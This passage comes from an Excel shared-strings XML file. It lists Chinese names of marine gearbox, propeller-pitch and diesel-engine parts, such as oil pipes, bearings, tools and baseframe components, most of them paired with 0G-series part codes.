  </si>
  <si>
    <t>0G3473</t>
  </si>
  <si>
    <t xml:space="preserve">换向套筒                                              </t>
  </si>
  <si>
    <t>0G3474</t>
  </si>
  <si>
    <t xml:space="preserve">换向衬套                                              </t>
  </si>
  <si>
    <t>0G3475</t>
  </si>
  <si>
    <t xml:space="preserve">衬套制动板                                             </t>
  </si>
  <si>
    <t>0G3477</t>
  </si>
  <si>
    <t xml:space="preserve">换向机构连接环                                           </t>
  </si>
  <si>
    <t>0G3478</t>
  </si>
  <si>
    <t xml:space="preserve">衬套定位销                                             </t>
  </si>
  <si>
    <t>0G3479</t>
  </si>
  <si>
    <t xml:space="preserve">油套总成                                              </t>
  </si>
  <si>
    <t>0G3500</t>
  </si>
  <si>
    <t xml:space="preserve">油套                                                </t>
  </si>
  <si>
    <t>0G3501</t>
  </si>
  <si>
    <t xml:space="preserve">油套-加工前                                            </t>
  </si>
  <si>
    <t>0G3502</t>
  </si>
  <si>
    <t xml:space="preserve">油套管                                               </t>
  </si>
  <si>
    <t>0G3504</t>
  </si>
  <si>
    <t xml:space="preserve">油衬套                                               </t>
  </si>
  <si>
    <t>0G3506</t>
  </si>
  <si>
    <t xml:space="preserve">油衬套-毛坯                                            </t>
  </si>
  <si>
    <t>0G3507</t>
  </si>
  <si>
    <t xml:space="preserve">油套管定距环                                            </t>
  </si>
  <si>
    <t>0G3509</t>
  </si>
  <si>
    <t xml:space="preserve">油套管后端盖                                            </t>
  </si>
  <si>
    <t>0G3510</t>
  </si>
  <si>
    <t xml:space="preserve">油套管端盖                                             </t>
  </si>
  <si>
    <t>0G3511</t>
  </si>
  <si>
    <t xml:space="preserve">油套管端盖-毛坯                                          </t>
  </si>
  <si>
    <t>0G3512</t>
  </si>
  <si>
    <t xml:space="preserve">阀套-油套                                             </t>
  </si>
  <si>
    <t>0G3520</t>
  </si>
  <si>
    <t xml:space="preserve">单向阀-总成                                            </t>
  </si>
  <si>
    <t>0G3522</t>
  </si>
  <si>
    <t xml:space="preserve">单向阀                                               </t>
  </si>
  <si>
    <t>0G3523</t>
  </si>
  <si>
    <t xml:space="preserve">阀体                                                </t>
  </si>
  <si>
    <t>0G3524</t>
  </si>
  <si>
    <t xml:space="preserve">阀导板                                               </t>
  </si>
  <si>
    <t>0G3525</t>
  </si>
  <si>
    <t xml:space="preserve">阀壳                                                </t>
  </si>
  <si>
    <t>0G3526</t>
  </si>
  <si>
    <t xml:space="preserve">阀-活塞                                              </t>
  </si>
  <si>
    <t>0G3527</t>
  </si>
  <si>
    <t xml:space="preserve">油套管支架                                             </t>
  </si>
  <si>
    <t>0G3540</t>
  </si>
  <si>
    <t>0G3542</t>
  </si>
  <si>
    <t xml:space="preserve">支板-油套                                             </t>
  </si>
  <si>
    <t>0G3543</t>
  </si>
  <si>
    <t xml:space="preserve">支架螺钉-油套                                           </t>
  </si>
  <si>
    <t>0G3545</t>
  </si>
  <si>
    <t xml:space="preserve">标尺安装                                              </t>
  </si>
  <si>
    <t>0G3600</t>
  </si>
  <si>
    <t xml:space="preserve">量油尺                                               </t>
  </si>
  <si>
    <t>0G3601</t>
  </si>
  <si>
    <t xml:space="preserve">量油尺管                                              </t>
  </si>
  <si>
    <t>0G3603</t>
  </si>
  <si>
    <t xml:space="preserve">量油尺凸塞                                             </t>
  </si>
  <si>
    <t>0G3605</t>
  </si>
  <si>
    <t xml:space="preserve">桨距指示器安装                                           </t>
  </si>
  <si>
    <t>0G3630</t>
  </si>
  <si>
    <t xml:space="preserve">电位计网轮                                             </t>
  </si>
  <si>
    <t>0G3634</t>
  </si>
  <si>
    <t xml:space="preserve">电位计衬套                                             </t>
  </si>
  <si>
    <t>0G3635</t>
  </si>
  <si>
    <t xml:space="preserve">电位计轴                                              </t>
  </si>
  <si>
    <t>0G3636</t>
  </si>
  <si>
    <t xml:space="preserve">桨距指示器布置                                           </t>
  </si>
  <si>
    <t>0G3650</t>
  </si>
  <si>
    <t xml:space="preserve">圆盘钢丝总成                                            </t>
  </si>
  <si>
    <t>0G3652</t>
  </si>
  <si>
    <t xml:space="preserve">圆盘钢丝螺距指示器                                         </t>
  </si>
  <si>
    <t>0G3653</t>
  </si>
  <si>
    <t xml:space="preserve">圆盘钢丝支架                                            </t>
  </si>
  <si>
    <t>0G3654</t>
  </si>
  <si>
    <t>0G3655</t>
  </si>
  <si>
    <t xml:space="preserve">圆盘钢丝定位销                                           </t>
  </si>
  <si>
    <t>0G3656</t>
  </si>
  <si>
    <t xml:space="preserve">锁紧钢丝                                              </t>
  </si>
  <si>
    <t>0G3660</t>
  </si>
  <si>
    <t xml:space="preserve">钢丝绳                                               </t>
  </si>
  <si>
    <t>0G3661</t>
  </si>
  <si>
    <t xml:space="preserve">弹簧螺钉                                              </t>
  </si>
  <si>
    <t>0G3663</t>
  </si>
  <si>
    <t xml:space="preserve">螺纹接头                                              </t>
  </si>
  <si>
    <t>0G3664</t>
  </si>
  <si>
    <t xml:space="preserve">内部管子安装                                            </t>
  </si>
  <si>
    <t>0G3700</t>
  </si>
  <si>
    <t xml:space="preserve">外部管子安装                                            </t>
  </si>
  <si>
    <t>0G3702</t>
  </si>
  <si>
    <t xml:space="preserve">吸入管安装                                             </t>
  </si>
  <si>
    <t>0G3706</t>
  </si>
  <si>
    <t xml:space="preserve">润滑油管安装                                            </t>
  </si>
  <si>
    <t>0G3707</t>
  </si>
  <si>
    <t xml:space="preserve">伺服油管安装                                            </t>
  </si>
  <si>
    <t>0G3708</t>
  </si>
  <si>
    <t xml:space="preserve">离合器油管安装                                           </t>
  </si>
  <si>
    <t>0G3709</t>
  </si>
  <si>
    <t xml:space="preserve">吸入管-变速箱/预滤器                                       </t>
  </si>
  <si>
    <t>0G3720</t>
  </si>
  <si>
    <t xml:space="preserve">吸入管-预滤器/泵                                         </t>
  </si>
  <si>
    <t>0G3721</t>
  </si>
  <si>
    <t xml:space="preserve">润滑油管-推力轴承                                         </t>
  </si>
  <si>
    <t>0G3740</t>
  </si>
  <si>
    <t xml:space="preserve">润滑油管-滤器/变速箱                                       </t>
  </si>
  <si>
    <t>0G3741</t>
  </si>
  <si>
    <t xml:space="preserve">润滑油管-滤器/润滑油阀                                      </t>
  </si>
  <si>
    <t>0G3742</t>
  </si>
  <si>
    <t xml:space="preserve">润滑油管-油堵/冷却器                                       </t>
  </si>
  <si>
    <t>0G3743</t>
  </si>
  <si>
    <t xml:space="preserve">润滑油管-油堵/自动调温器                                     </t>
  </si>
  <si>
    <t>0G3744</t>
  </si>
  <si>
    <t xml:space="preserve">润滑油管-冷却器/齿轮箱                                      </t>
  </si>
  <si>
    <t>0G3746</t>
  </si>
  <si>
    <t xml:space="preserve">润滑油管-冷却器/轴承                                       </t>
  </si>
  <si>
    <t>0G3747</t>
  </si>
  <si>
    <t xml:space="preserve">润滑油管-冷却器/推力轴承                                     </t>
  </si>
  <si>
    <t>0G3748</t>
  </si>
  <si>
    <t xml:space="preserve">润滑油管-变速箱/轴承                                       </t>
  </si>
  <si>
    <t>0G3750</t>
  </si>
  <si>
    <t xml:space="preserve">管-油堵/伺服滑动                                         </t>
  </si>
  <si>
    <t>0G3760</t>
  </si>
  <si>
    <t xml:space="preserve">管-油堵/压力增加                                         </t>
  </si>
  <si>
    <t>0G3761</t>
  </si>
  <si>
    <t xml:space="preserve">管-油泵/油堵                                           </t>
  </si>
  <si>
    <t>0G3762</t>
  </si>
  <si>
    <t xml:space="preserve">管-油泵/安全阀                                          </t>
  </si>
  <si>
    <t>0G3763</t>
  </si>
  <si>
    <t xml:space="preserve">管-备用泵/油堵                                          </t>
  </si>
  <si>
    <t>0G3764</t>
  </si>
  <si>
    <t xml:space="preserve">管-安全阀/滤器                                          </t>
  </si>
  <si>
    <t>0G3765</t>
  </si>
  <si>
    <t xml:space="preserve">管-滤器/安全阀                                          </t>
  </si>
  <si>
    <t>0G3766</t>
  </si>
  <si>
    <t xml:space="preserve">管-滤器/油堵                                           </t>
  </si>
  <si>
    <t>0G3767</t>
  </si>
  <si>
    <t xml:space="preserve">管-泵/变速箱                                           </t>
  </si>
  <si>
    <t>0G3768</t>
  </si>
  <si>
    <t xml:space="preserve">离合器管-堵头/蓄压器                                       </t>
  </si>
  <si>
    <t>0G3780</t>
  </si>
  <si>
    <t xml:space="preserve">离合器管-堵头/离合器输入                                     </t>
  </si>
  <si>
    <t>0G3781</t>
  </si>
  <si>
    <t xml:space="preserve">离合器管-堵头/离合器输出                                     </t>
  </si>
  <si>
    <t>0G3782</t>
  </si>
  <si>
    <t xml:space="preserve">离合器管-堵头/离合器                                       </t>
  </si>
  <si>
    <t>0G3783</t>
  </si>
  <si>
    <t xml:space="preserve">吸入管-内部                                            </t>
  </si>
  <si>
    <t>0G3800</t>
  </si>
  <si>
    <t xml:space="preserve">吸入管-外部                                            </t>
  </si>
  <si>
    <t>0G3801</t>
  </si>
  <si>
    <t xml:space="preserve">带法兰吸入管                                            </t>
  </si>
  <si>
    <t>0G3802</t>
  </si>
  <si>
    <t xml:space="preserve">吸入管的管截面                                           </t>
  </si>
  <si>
    <t>0G3803</t>
  </si>
  <si>
    <t xml:space="preserve">吸入管法兰                                             </t>
  </si>
  <si>
    <t>0G3804</t>
  </si>
  <si>
    <t xml:space="preserve">吸入管支架                                             </t>
  </si>
  <si>
    <t>0G3808</t>
  </si>
  <si>
    <t xml:space="preserve">润滑油管-内部                                           </t>
  </si>
  <si>
    <t>0G3820</t>
  </si>
  <si>
    <t xml:space="preserve">润滑油管-外部                                           </t>
  </si>
  <si>
    <t>0G3821</t>
  </si>
  <si>
    <t xml:space="preserve">带法兰润滑油管                                           </t>
  </si>
  <si>
    <t>0G3822</t>
  </si>
  <si>
    <t xml:space="preserve">润滑油管的管截面                                          </t>
  </si>
  <si>
    <t>0G3823</t>
  </si>
  <si>
    <t xml:space="preserve">滑油管法兰                                             </t>
  </si>
  <si>
    <t>0G3824</t>
  </si>
  <si>
    <t>0G3826</t>
  </si>
  <si>
    <t xml:space="preserve">润滑油管支架                                            </t>
  </si>
  <si>
    <t>0G3828</t>
  </si>
  <si>
    <t xml:space="preserve">喷管                                                </t>
  </si>
  <si>
    <t>0G3830</t>
  </si>
  <si>
    <t xml:space="preserve">伺服油管-内部                                           </t>
  </si>
  <si>
    <t>0G3840</t>
  </si>
  <si>
    <t xml:space="preserve">伺服油管-外部                                           </t>
  </si>
  <si>
    <t>0G3841</t>
  </si>
  <si>
    <t xml:space="preserve">带法兰伺服油管                                           </t>
  </si>
  <si>
    <t>0G3842</t>
  </si>
  <si>
    <t xml:space="preserve">伺服油管截面                                            </t>
  </si>
  <si>
    <t>0G3843</t>
  </si>
  <si>
    <t xml:space="preserve">伺服油管法兰                                            </t>
  </si>
  <si>
    <t>0G3844</t>
  </si>
  <si>
    <t xml:space="preserve">伺服油管支架                                            </t>
  </si>
  <si>
    <t>0G3848</t>
  </si>
  <si>
    <t xml:space="preserve">离合器油管-内部                                          </t>
  </si>
  <si>
    <t>0G3860</t>
  </si>
  <si>
    <t xml:space="preserve">离合器油管-外部                                          </t>
  </si>
  <si>
    <t>0G3861</t>
  </si>
  <si>
    <t xml:space="preserve">带法兰离合器油管                                          </t>
  </si>
  <si>
    <t>0G3862</t>
  </si>
  <si>
    <t xml:space="preserve">离合器油管截面                                           </t>
  </si>
  <si>
    <t>0G3863</t>
  </si>
  <si>
    <t xml:space="preserve">油管法兰                                              </t>
  </si>
  <si>
    <t>0G3864</t>
  </si>
  <si>
    <t xml:space="preserve">油管支架                                              </t>
  </si>
  <si>
    <t>0G3868</t>
  </si>
  <si>
    <t xml:space="preserve">管夹                                                </t>
  </si>
  <si>
    <t>0G3880</t>
  </si>
  <si>
    <t xml:space="preserve">管截面                                               </t>
  </si>
  <si>
    <t>0G3882</t>
  </si>
  <si>
    <t xml:space="preserve">液压软管-低压                                           </t>
  </si>
  <si>
    <t>0G3890</t>
  </si>
  <si>
    <t xml:space="preserve">液压软管-高压                                           </t>
  </si>
  <si>
    <t>0G3891</t>
  </si>
  <si>
    <t xml:space="preserve">快速接头-凸的                                           </t>
  </si>
  <si>
    <t>0G3893</t>
  </si>
  <si>
    <t xml:space="preserve">快速接头-凹的                                           </t>
  </si>
  <si>
    <t>0G3894</t>
  </si>
  <si>
    <t xml:space="preserve">与发动机相关的齿轮工具                                       </t>
  </si>
  <si>
    <t>0G5000</t>
  </si>
  <si>
    <t xml:space="preserve">与发动机无关的齿轮工具                                       </t>
  </si>
  <si>
    <t>0G5002</t>
  </si>
  <si>
    <t xml:space="preserve">检验伺服系统                                            </t>
  </si>
  <si>
    <t>0G5020</t>
  </si>
  <si>
    <t xml:space="preserve">检验伺服系统-底盖                                         </t>
  </si>
  <si>
    <t>0G5021</t>
  </si>
  <si>
    <t xml:space="preserve">检验伺服系统-伺服气缸                                       </t>
  </si>
  <si>
    <t>0G5022</t>
  </si>
  <si>
    <t xml:space="preserve">检验伺服系统-伺服活塞                                       </t>
  </si>
  <si>
    <t>0G5023</t>
  </si>
  <si>
    <t xml:space="preserve">安装工具-伺服系统                                         </t>
  </si>
  <si>
    <t>0G5040</t>
  </si>
  <si>
    <t xml:space="preserve">安装工具-离合器                                          </t>
  </si>
  <si>
    <t>0G5041</t>
  </si>
  <si>
    <t xml:space="preserve">圆锥毂推动工具                                           </t>
  </si>
  <si>
    <t>0G5043</t>
  </si>
  <si>
    <t xml:space="preserve">辅助工具安装                                            </t>
  </si>
  <si>
    <t>0G5048</t>
  </si>
  <si>
    <t xml:space="preserve">辅助工具                                              </t>
  </si>
  <si>
    <t>0G5049</t>
  </si>
  <si>
    <t xml:space="preserve">压进心轴                                              </t>
  </si>
  <si>
    <t>0G5050</t>
  </si>
  <si>
    <t xml:space="preserve">推动器                                               </t>
  </si>
  <si>
    <t>0G5051</t>
  </si>
  <si>
    <t xml:space="preserve">提升气缸                                              </t>
  </si>
  <si>
    <t>0G5052</t>
  </si>
  <si>
    <t xml:space="preserve">螺纹适配器-提升工具                                        </t>
  </si>
  <si>
    <t>0G5053</t>
  </si>
  <si>
    <t xml:space="preserve">中心销-提升工具                                          </t>
  </si>
  <si>
    <t>0G5054</t>
  </si>
  <si>
    <t xml:space="preserve">对接法兰工具                                            </t>
  </si>
  <si>
    <t>0G5055</t>
  </si>
  <si>
    <t xml:space="preserve">锁紧垫圈工具                                            </t>
  </si>
  <si>
    <t>0G5056</t>
  </si>
  <si>
    <t xml:space="preserve">应急控制工具                                            </t>
  </si>
  <si>
    <t>0G5080</t>
  </si>
  <si>
    <t xml:space="preserve">定位管-应急控制                                          </t>
  </si>
  <si>
    <t>0G5082</t>
  </si>
  <si>
    <t xml:space="preserve">应急控制盖                                             </t>
  </si>
  <si>
    <t>0G5083</t>
  </si>
  <si>
    <t xml:space="preserve">应急控制针阀                                            </t>
  </si>
  <si>
    <t>0G5084</t>
  </si>
  <si>
    <t xml:space="preserve">定距环-应急控制                                          </t>
  </si>
  <si>
    <t>0G5085</t>
  </si>
  <si>
    <t xml:space="preserve">应急螺钉                                              </t>
  </si>
  <si>
    <t>0G5088</t>
  </si>
  <si>
    <t xml:space="preserve">应急                                                </t>
  </si>
  <si>
    <t>0G5089</t>
  </si>
  <si>
    <t xml:space="preserve">传输设置-齿轮                                           </t>
  </si>
  <si>
    <t>0G5100</t>
  </si>
  <si>
    <t xml:space="preserve">传输工具                                              </t>
  </si>
  <si>
    <t>0G5102</t>
  </si>
  <si>
    <t xml:space="preserve">金属带-齿轮传递                                          </t>
  </si>
  <si>
    <t>0G5110</t>
  </si>
  <si>
    <t xml:space="preserve">卸扣-齿轮传递                                           </t>
  </si>
  <si>
    <t>0G5111</t>
  </si>
  <si>
    <t xml:space="preserve">吊环-齿轮传递                                           </t>
  </si>
  <si>
    <t>0G5112</t>
  </si>
  <si>
    <t xml:space="preserve">螺钉-齿轮传递                                           </t>
  </si>
  <si>
    <t>0G5113</t>
  </si>
  <si>
    <t xml:space="preserve">齿轮传送适配器                                           </t>
  </si>
  <si>
    <t>0G5114</t>
  </si>
  <si>
    <t xml:space="preserve">支架-齿轮传递                                           </t>
  </si>
  <si>
    <t>0G5115</t>
  </si>
  <si>
    <t xml:space="preserve">标准备件提供                                            </t>
  </si>
  <si>
    <t>0G5200</t>
  </si>
  <si>
    <t xml:space="preserve">额外备件提供                                            </t>
  </si>
  <si>
    <t>0G5202</t>
  </si>
  <si>
    <t xml:space="preserve">投油工艺-传动装置                                         </t>
  </si>
  <si>
    <t>0G5250</t>
  </si>
  <si>
    <t xml:space="preserve">冲洗设备-连接                                           </t>
  </si>
  <si>
    <t>0G5252</t>
  </si>
  <si>
    <t xml:space="preserve">冲洗设备                                              </t>
  </si>
  <si>
    <t>0G5254</t>
  </si>
  <si>
    <t xml:space="preserve">冲洗软管                                              </t>
  </si>
  <si>
    <t>0G5260</t>
  </si>
  <si>
    <t xml:space="preserve">冲洗过滤包                                             </t>
  </si>
  <si>
    <t>0G5262</t>
  </si>
  <si>
    <t>0G5264</t>
  </si>
  <si>
    <t xml:space="preserve">法兰-过滤包                                            </t>
  </si>
  <si>
    <t>0G5266</t>
  </si>
  <si>
    <t xml:space="preserve">支架总成                                              </t>
  </si>
  <si>
    <t>0G9000</t>
  </si>
  <si>
    <t xml:space="preserve">支架                                                </t>
  </si>
  <si>
    <t>0G9001</t>
  </si>
  <si>
    <t xml:space="preserve">支板                                                </t>
  </si>
  <si>
    <t>0G9002</t>
  </si>
  <si>
    <t xml:space="preserve">交叉臂                                               </t>
  </si>
  <si>
    <t>0G9003</t>
  </si>
  <si>
    <t xml:space="preserve">支撑                                                </t>
  </si>
  <si>
    <t>0G9004</t>
  </si>
  <si>
    <t xml:space="preserve">角度                                                </t>
  </si>
  <si>
    <t>0G9007</t>
  </si>
  <si>
    <t xml:space="preserve">定距块                                               </t>
  </si>
  <si>
    <t>0G9010</t>
  </si>
  <si>
    <t xml:space="preserve">定距套管                                              </t>
  </si>
  <si>
    <t>0G9011</t>
  </si>
  <si>
    <t xml:space="preserve">锁板                                                </t>
  </si>
  <si>
    <t>0G9017</t>
  </si>
  <si>
    <t xml:space="preserve">密封圈                                               </t>
  </si>
  <si>
    <t>0G9160</t>
  </si>
  <si>
    <t xml:space="preserve">调整螺栓                                              </t>
  </si>
  <si>
    <t>0G9200</t>
  </si>
  <si>
    <t xml:space="preserve">螺帽                                                </t>
  </si>
  <si>
    <t>0G9220</t>
  </si>
  <si>
    <t xml:space="preserve">插销                                                </t>
  </si>
  <si>
    <t>0G9230</t>
  </si>
  <si>
    <t xml:space="preserve">喷嘴塞子                                              </t>
  </si>
  <si>
    <t>0G9231</t>
  </si>
  <si>
    <t xml:space="preserve">定位销-圆锥形                                           </t>
  </si>
  <si>
    <t>0G9240</t>
  </si>
  <si>
    <t xml:space="preserve">定位销-圆柱形                                           </t>
  </si>
  <si>
    <t>0G9241</t>
  </si>
  <si>
    <t xml:space="preserve">贯穿螺栓                                              </t>
  </si>
  <si>
    <t>0G9260</t>
  </si>
  <si>
    <t xml:space="preserve">紧配螺钉                                              </t>
  </si>
  <si>
    <t>0G9262</t>
  </si>
  <si>
    <t xml:space="preserve">角度球形接头                                            </t>
  </si>
  <si>
    <t>0G9280</t>
  </si>
  <si>
    <t xml:space="preserve">带螺母的角度球                                           </t>
  </si>
  <si>
    <t>0G9281</t>
  </si>
  <si>
    <t xml:space="preserve">硬化垫圈                                              </t>
  </si>
  <si>
    <t>0G9285</t>
  </si>
  <si>
    <t xml:space="preserve">要求的信息号                                            </t>
  </si>
  <si>
    <t>0G9999</t>
  </si>
  <si>
    <t xml:space="preserve">部件(单独的)测试图                                        </t>
  </si>
  <si>
    <t xml:space="preserve">中间轴-试车台                                           </t>
  </si>
  <si>
    <t xml:space="preserve">频率转换器                                             </t>
  </si>
  <si>
    <t xml:space="preserve"> 奥格斯堡图                                            </t>
  </si>
  <si>
    <t xml:space="preserve">未指明的描述                                            </t>
  </si>
  <si>
    <t xml:space="preserve">未指明的信息号                                           </t>
  </si>
  <si>
    <t xml:space="preserve">TEGLHOLMEN                                        </t>
  </si>
  <si>
    <t xml:space="preserve">应变仪测量                                             </t>
  </si>
  <si>
    <t xml:space="preserve">板                                                 </t>
  </si>
  <si>
    <t xml:space="preserve">角铁架                                               </t>
  </si>
  <si>
    <t xml:space="preserve">日用油箱.不同制图                                         </t>
  </si>
  <si>
    <t xml:space="preserve">混凝土基座                                             </t>
  </si>
  <si>
    <t xml:space="preserve">热平衡冷却水                                            </t>
  </si>
  <si>
    <t xml:space="preserve">扭振数据表                                             </t>
  </si>
  <si>
    <t xml:space="preserve">装置说明书                                             </t>
  </si>
  <si>
    <t xml:space="preserve">弹性安装数据                                            </t>
  </si>
  <si>
    <t xml:space="preserve">总布置                                               </t>
  </si>
  <si>
    <t xml:space="preserve">法兰列表                                              </t>
  </si>
  <si>
    <t xml:space="preserve">外接软管                                              </t>
  </si>
  <si>
    <t xml:space="preserve">管子布置                                              </t>
  </si>
  <si>
    <t xml:space="preserve">建筑图                                               </t>
  </si>
  <si>
    <t xml:space="preserve">固定说明                                              </t>
  </si>
  <si>
    <t xml:space="preserve">板选择图表                                             </t>
  </si>
  <si>
    <t xml:space="preserve">系统描述                                              </t>
  </si>
  <si>
    <t xml:space="preserve">交流发电机轴尺寸                                          </t>
  </si>
  <si>
    <t xml:space="preserve">产品手册                                              </t>
  </si>
  <si>
    <t xml:space="preserve">流程图                                               </t>
  </si>
  <si>
    <t xml:space="preserve">发电设备说明                                            </t>
  </si>
  <si>
    <t xml:space="preserve">符号列表                                              </t>
  </si>
  <si>
    <t xml:space="preserve">安装手册                                              </t>
  </si>
  <si>
    <t xml:space="preserve">曲轴列表                                              </t>
  </si>
  <si>
    <t xml:space="preserve">压缩空气系统                                            </t>
  </si>
  <si>
    <t xml:space="preserve">燃油系统                                              </t>
  </si>
  <si>
    <t xml:space="preserve">润滑油系统                                             </t>
  </si>
  <si>
    <t xml:space="preserve">冷却水系统                                             </t>
  </si>
  <si>
    <t xml:space="preserve">助燃空气系统                                            </t>
  </si>
  <si>
    <t xml:space="preserve">蒸汽系统                                              </t>
  </si>
  <si>
    <t xml:space="preserve">供水系统                                              </t>
  </si>
  <si>
    <t xml:space="preserve">柴油供给系统                                            </t>
  </si>
  <si>
    <t xml:space="preserve">重油供给系统                                            </t>
  </si>
  <si>
    <t xml:space="preserve">污油系统                                              </t>
  </si>
  <si>
    <t xml:space="preserve">燃油供给系统                                            </t>
  </si>
  <si>
    <t xml:space="preserve">建筑规划                                              </t>
  </si>
  <si>
    <t xml:space="preserve">混合单元                                              </t>
  </si>
  <si>
    <t xml:space="preserve">量油计安装                                             </t>
  </si>
  <si>
    <t xml:space="preserve">关键设计                                              </t>
  </si>
  <si>
    <t xml:space="preserve">外形图                                               </t>
  </si>
  <si>
    <t xml:space="preserve">IMO认可                                             </t>
  </si>
  <si>
    <t xml:space="preserve">制图                                                </t>
  </si>
  <si>
    <t xml:space="preserve">概略计算等                                             </t>
  </si>
  <si>
    <t xml:space="preserve">机座自由端                                             </t>
  </si>
  <si>
    <t xml:space="preserve">机座输出端                                             </t>
  </si>
  <si>
    <t xml:space="preserve">机座-截面图                                            </t>
  </si>
  <si>
    <t xml:space="preserve">机座                                                </t>
  </si>
  <si>
    <t xml:space="preserve">主轴承座                                              </t>
  </si>
  <si>
    <t xml:space="preserve">主轴承座前端                                            </t>
  </si>
  <si>
    <t xml:space="preserve">主轴承座后端                                            </t>
  </si>
  <si>
    <t xml:space="preserve">推力轴承座                                             </t>
  </si>
  <si>
    <t xml:space="preserve">横梁                                                </t>
  </si>
  <si>
    <t xml:space="preserve">纵梁前端                                              </t>
  </si>
  <si>
    <t xml:space="preserve">纵梁                                                </t>
  </si>
  <si>
    <t xml:space="preserve">纵梁后端                                              </t>
  </si>
  <si>
    <t xml:space="preserve">横梁前端                                              </t>
  </si>
  <si>
    <t xml:space="preserve">横梁后端                                              </t>
  </si>
  <si>
    <t xml:space="preserve">机座加工                                              </t>
  </si>
  <si>
    <t xml:space="preserve">机座切割面/面清单                                         </t>
  </si>
  <si>
    <t xml:space="preserve">轴向振动减振器                                           </t>
  </si>
  <si>
    <t xml:space="preserve">轴向减振器体上端部件                                        </t>
  </si>
  <si>
    <t xml:space="preserve">轴向减振器体下端部件                                        </t>
  </si>
  <si>
    <t xml:space="preserve">油密封-轴向减振器                                         </t>
  </si>
  <si>
    <t xml:space="preserve">螺栓-轴向减振器                                          </t>
  </si>
  <si>
    <t xml:space="preserve">减振器限制                                             </t>
  </si>
  <si>
    <t xml:space="preserve">减振器-油管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">电子接近仪                                             </t>
  </si>
  <si>
    <t xml:space="preserve">电子接近仪探头                                           </t>
  </si>
  <si>
    <t xml:space="preserve">电子耗尽表                                             </t>
  </si>
  <si>
    <t xml:space="preserve">8mm接近仪                                            </t>
  </si>
  <si>
    <t xml:space="preserve">油底壳                                               </t>
  </si>
  <si>
    <t xml:space="preserve">底板                                                </t>
  </si>
  <si>
    <t xml:space="preserve">支承凸缘                                              </t>
  </si>
  <si>
    <t xml:space="preserve">定位销                                               </t>
  </si>
  <si>
    <t xml:space="preserve">顶板                                                </t>
  </si>
  <si>
    <t xml:space="preserve">横腹板                                               </t>
  </si>
  <si>
    <t xml:space="preserve">装配法兰                                              </t>
  </si>
  <si>
    <t xml:space="preserve">法兰                                                </t>
  </si>
  <si>
    <t xml:space="preserve">端板                                                </t>
  </si>
  <si>
    <t xml:space="preserve">筋板                                                </t>
  </si>
  <si>
    <t xml:space="preserve">面板                                                </t>
  </si>
  <si>
    <t xml:space="preserve">吊梁                                                </t>
  </si>
  <si>
    <t xml:space="preserve">凸耳                                                </t>
  </si>
  <si>
    <t xml:space="preserve">加强筋                                               </t>
  </si>
  <si>
    <t xml:space="preserve">手柄                                                </t>
  </si>
  <si>
    <t xml:space="preserve">泻放管                                               </t>
  </si>
  <si>
    <t xml:space="preserve">间隙，主轴承                                            </t>
  </si>
  <si>
    <t xml:space="preserve">主轴承                                               </t>
  </si>
  <si>
    <t xml:space="preserve">轴瓦毛坯                                              </t>
  </si>
  <si>
    <t xml:space="preserve">主轴承上轴瓦                                            </t>
  </si>
  <si>
    <t xml:space="preserve">主轴承下轴瓦                                            </t>
  </si>
  <si>
    <t xml:space="preserve">定向轴瓦-上端                                           </t>
  </si>
  <si>
    <t xml:space="preserve">定向轴瓦-下端                                           </t>
  </si>
  <si>
    <t xml:space="preserve">上主轴承白合金                                           </t>
  </si>
  <si>
    <t xml:space="preserve">下主轴承白合金                                           </t>
  </si>
  <si>
    <t xml:space="preserve">上导向轴承白合金                                          </t>
  </si>
  <si>
    <t xml:space="preserve">下导向轴承白合金                                          </t>
  </si>
  <si>
    <t xml:space="preserve">主轴承盖                                              </t>
  </si>
  <si>
    <t xml:space="preserve">润滑油管                                              </t>
  </si>
  <si>
    <t xml:space="preserve">主轴承螺栓                                             </t>
  </si>
  <si>
    <t xml:space="preserve">主轴承螺母                                             </t>
  </si>
  <si>
    <t xml:space="preserve">垫片                                                </t>
  </si>
  <si>
    <t xml:space="preserve">试验                                                </t>
  </si>
  <si>
    <t xml:space="preserve">轴颈轴承                                              </t>
  </si>
  <si>
    <t xml:space="preserve">推力轴承上轴瓦                                           </t>
  </si>
  <si>
    <t xml:space="preserve">推力轴承下轴瓦                                           </t>
  </si>
  <si>
    <t xml:space="preserve">上轴颈轴承白合金                                          </t>
  </si>
  <si>
    <t xml:space="preserve">下轴颈轴承白合金                                          </t>
  </si>
  <si>
    <t xml:space="preserve">轴颈轴承盖                                             </t>
  </si>
  <si>
    <t xml:space="preserve">推力轴承螺栓                                            </t>
  </si>
  <si>
    <t xml:space="preserve">油盘                                                </t>
  </si>
  <si>
    <t xml:space="preserve">油盘-截面图                                            </t>
  </si>
  <si>
    <t xml:space="preserve">格栅                                                </t>
  </si>
  <si>
    <t xml:space="preserve">膨胀部分                                              </t>
  </si>
  <si>
    <t xml:space="preserve">量油计                                               </t>
  </si>
  <si>
    <t xml:space="preserve">吸管                                                </t>
  </si>
  <si>
    <t xml:space="preserve">盖板                                                </t>
  </si>
  <si>
    <t xml:space="preserve">驱动器-Y56F                                          </t>
  </si>
  <si>
    <t xml:space="preserve">泵站                                                </t>
  </si>
  <si>
    <t xml:space="preserve">油盘详细说明                                            </t>
  </si>
  <si>
    <t xml:space="preserve">校准螺栓                                              </t>
  </si>
  <si>
    <t xml:space="preserve">管                                                 </t>
  </si>
  <si>
    <t xml:space="preserve">在螺母上定位焊接                                          </t>
  </si>
  <si>
    <t xml:space="preserve">冲孔板                                               </t>
  </si>
  <si>
    <t xml:space="preserve">腹板                                                </t>
  </si>
  <si>
    <t xml:space="preserve">盲法兰                                               </t>
  </si>
  <si>
    <t xml:space="preserve">圆钢                                                </t>
  </si>
  <si>
    <t xml:space="preserve">齿轮箱                                               </t>
  </si>
  <si>
    <t xml:space="preserve">拱肋上端后盖                                            </t>
  </si>
  <si>
    <t xml:space="preserve">飞轮缀板                                              </t>
  </si>
  <si>
    <t xml:space="preserve">板装配                                               </t>
  </si>
  <si>
    <t xml:space="preserve">支架.润滑油冷却器                                         </t>
  </si>
  <si>
    <t xml:space="preserve">柴油机下端侧板                                           </t>
  </si>
  <si>
    <t xml:space="preserve">柴油机下端底板                                           </t>
  </si>
  <si>
    <t xml:space="preserve">柴油机下端上法兰                                          </t>
  </si>
  <si>
    <t xml:space="preserve">液位报警器管                                            </t>
  </si>
  <si>
    <t xml:space="preserve">前挡板                                               </t>
  </si>
  <si>
    <t xml:space="preserve">前板                                                </t>
  </si>
  <si>
    <t xml:space="preserve">柴油机下端筋板                                           </t>
  </si>
  <si>
    <t xml:space="preserve">矩形中空截面                                            </t>
  </si>
